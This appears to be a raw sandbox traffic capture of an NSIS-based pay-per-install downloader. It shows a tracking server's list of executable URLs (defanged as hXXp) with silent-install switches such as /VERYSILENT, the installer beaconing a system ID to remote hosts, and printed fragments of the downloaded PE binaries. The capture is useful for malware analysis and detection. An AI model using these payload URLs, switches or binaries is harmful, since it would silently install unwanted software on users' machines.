{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:27
:52 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:27:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:27
:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:03 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:03 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:04 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:04 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 185
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:15 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:15 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 198
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:25 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:25 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:26 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:26 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 503 Service Unavailable
Cache-Control: no-cache
Content-Type: text/html
transfer-encoding: chunked
Connection: keep-alive
6b..<html><body><h1>503 Service Unavailable</h1&g
t;.No server is available to handle this request..</body></ht
ml>...0..HTTP/1.1 503 Service Unavailable..Cache-Control: no-cache.
.Content-Type: text/html..transfer-encoding: chunked..Connection: keep
-alive..6b..<html><body><h1>503 Service Unavailable&
lt;/h1>.No server is available to handle this request..</body>
;</html>...0......


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:37 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:47 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 24 Dec 2015 00:28:48 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, 
X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *
..Content-Type: text/html; charset=utf-8..Date: Thu, 24 Dec 2015 00:28
:48 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-a
live..{"Status":"OK"}..



POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache

cnt=ad70c77a656a8cbfc8becf0386552d1e&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1450916936&ts=1450916936&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Temp
sh1D.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 24 Dec 2015 00:28:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
....      ....



GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:27:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.30
42e..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=ob
i-tot-mdh-lvs-ppt-opw-jot-crr..hXXp://livestatscounter.com/SysInfo/val
idator/timer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888
555.exe.. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=__R9ylls..https:/
/s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC.
.hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..htt
p://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe
.. /ci 11612..hXXp://VVV.czzsyzgm.com/pptxd.exe.. ..hXXp://livestatsco
unter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=NOCHPC.. ..h
ttp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483.. ..hXXp://mob
ilitydata5.com/SysInfo/countup.php?sid=554655542.. ..hXXp://dl.taxidea
taxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT.
.hXXp://counter99.com/SysInfo/r2d.php?guid=587785-23098-234-1123F.. ..
hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-ser
vers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/SysInf
o/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Th
u, 24 Dec 2015 00:27:52 GMT..Content-Type: text/html..Transfer-Encodin
g: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.30..42e..htt
p://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=obi-tot-md
h-lvs-ppt-opw-jot-crr..hXXp://livestatscounter.com/SysInfo/validator/t
imer.php..hXXps://d24u51ac8ybaqu.cloudfront.net/inst/setup_888555.exe.
. asslHp==02OR:Ll5tt.R9Ryf?L~0n:LPsyPWs=ftil=__R9ylls..hXXps://s3.
<<< skipped >>>

GET /SysInfo/validator/timer.php HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 24 Dec 2015 00:28:03 GMT
Content-Type: application/octet-stream
Content-Length: 127888
Connection: keep-alive
X-Powered-By: PHP/5.5.30
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=L5lD0nHnr.exe
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................0...............................................t....
... ..................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...0...............................rsrc.
....... .......z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /prepreinstaller_win.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2u4zym7ey0920.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 557568
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:42:57 GMT
Last-Modified: Tue, 22 Dec 2015 09:35:36 GMT
ETag: "29bf30427bc3544fab563d0d7d36f05d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42245
X-Cache: Hit from cloudfront
Via: 1.1 edd2a5d0833e10b384dd66f5bbc84266.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gSQrgtUsaSNcpkgie_cOo1RXuzq_xv7DpIICzGiC8GVJPP5uCTluSA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$............}...}..
.}....W..}....b..}....c..}....Z..}...}...}....f..}....S..}...}^..}....
T..}..Rich.}..................PE..L...X.yV............................
.*............@.......................................@...............
..................|...<................................ ...........
........................K..@...............|..........................
..text............................... ..`.rdata.......................
.......@[email protected][email protected]..............
.................@[email protected][email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
.................................................T.B......U..V....T.B.
......E..t.V.....Y..^]...V..t.f.0f;1u.......Ju.3.^....f;.^[email protected],...
A..u.....3..u....C.3..G......w..}..E.f...u..E.....;.......3..U....U..K
..M....r.......f.<.=.........r...........P.E......Y..u.f.}. t.f.}./
.......{..r........M.f....E..f.Du.F...u}3..|u.....E.j..E.P3..,.B..*...
Ff.....|..E..M...........M.f.E..E...............f.E..E........E.3.f.E.
..D}..u.P.....G...|..}.3..}................j.Y;.}.3.... ...........|u.
....f..3..|].....E.j..E.P3..,.B..y...Cf.....|..E..M...........M.f.
<<< skipped >>>


GET /?file=bundle&v=2 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.djapp.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 24 Dec 2015 00:34:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 24 Dec 20
15 00:34:38 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Enco
ding: chunked..Connection: keep-alive..Location: hXXp://d2u4zym7ey0920
.cloudfront.net/prepreinstaller_win.exe..0..



GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 84407
Connection: keep-alive
Date: Wed, 23 Dec 2015 11:09:11 GMT
Last-Modified: Wed, 23 Dec 2015 11:04:25 GMT
ETag: "dd326cafa8f8dfb20c5183a1cc3daab6"
Accept-Ranges: bytes
Server: AmazonS3
Age: 47923
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: G0vkfgWSWmOoG3LP2Cs8yt7QCNjeLl4AM_Jc_0hjQ8A1kuw7WKreOw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9......0.......p....@..............
............@T..............................................s.......0T
......................................................................
........p...............................text...,Z.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]:..........................rsrc......
..0T......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...&z...Si.....VW.T.....tO.q.3.;5.&z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.&z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 58595
Connection: keep-alive
Date: Wed, 09 Dec 2015 22:28:08 GMT
Last-Modified: Wed, 09 Dec 2015 20:28:24 GMT
ETag: "a66865416d1330f1c571c12f4f8c2fea"
Accept-Ranges: bytes
Server: AmazonS3
Age: 41613
X-Cache: Hit from cloudfront
Via: 1.1 8f460f85e7788562e9f2e44d0aedb11b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wZX_L_EIjMsRp5H97nPRdzmv0gZK5VHBrULbLCc3Sxr95FlWrdhyIg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 24 Dec 2015 00:28:48 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=27832
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1450916928.dop010.fr7.t,1450916928.cds007.fr7.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d.
.K.................d..........^5............@.........................
[email protected].........
......................................................................
.............................text....c.......d.................. ..`.r
data...............h..............@[email protected]...........|..........
[email protected]... ... ...........................rsrc...8....@........
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
[email protected]...`[email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] [email protected].@._^3.
[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET hXXp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 HTTP/1.1
Host: json.agewftkv.com


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owi
zgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4
.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfron
t.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."req
uireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitC
odeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -
fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedParams":[]
, .."requireRegKeysCheck":true, .."regKeysToCheck":[.."LocalMachine\\S
OFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\S
akura\\gamegogle=*"..], .."minutesToSleepBeforeInstall":0,.."preInstal
lRegCheck": true,.."preInstallRegKeys": [    ..."LocalMachine\\SOFTWAR
E\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\
\gamegogle=*"..],.."blockIfInstalled" : false.}...0..HTTP/1.1 200 OK..
Server: nginx..Date: Thu, 24 Dec 2015 00:34:42 GMT..Content-Type: text
/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-ali
ve..373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor
9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dot
net4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloud
front.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", ..
"requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireE
xitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=3
53 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedPa
<<< skipped >>>


GET hXXp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.agewftkv.com
Proxy-Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..



GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d2u4zym7ey0920.cloudfront.net


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:43:01 GMT
Last-Modified: Tue, 22 Dec 2015 09:32:50 GMT
ETag: "a85df53ac3cdc0b948809c73b39b0571"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42158
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ck257rROkJVx5Ros0xI9HVewGDQJh8hFl1C5WoDiTXNhxH9I0456Rw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L.....yV
................................. ........@.. .......................@
............@.................................`...K...................
......... ....................................................... ....
........... ..H............text........ ...................... ..`.rsr
c...............................@[email protected]....... ....................
[email protected]..@ ..........
.................................(....*..~....*...(....*Vs....(....t..
.......*....*...*..(h...&*2..(....&..Z*....0..........(......c.d(....&
..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2.
.(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*...
.0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(.
.....c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&
..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2.
.(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*...
.0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(.
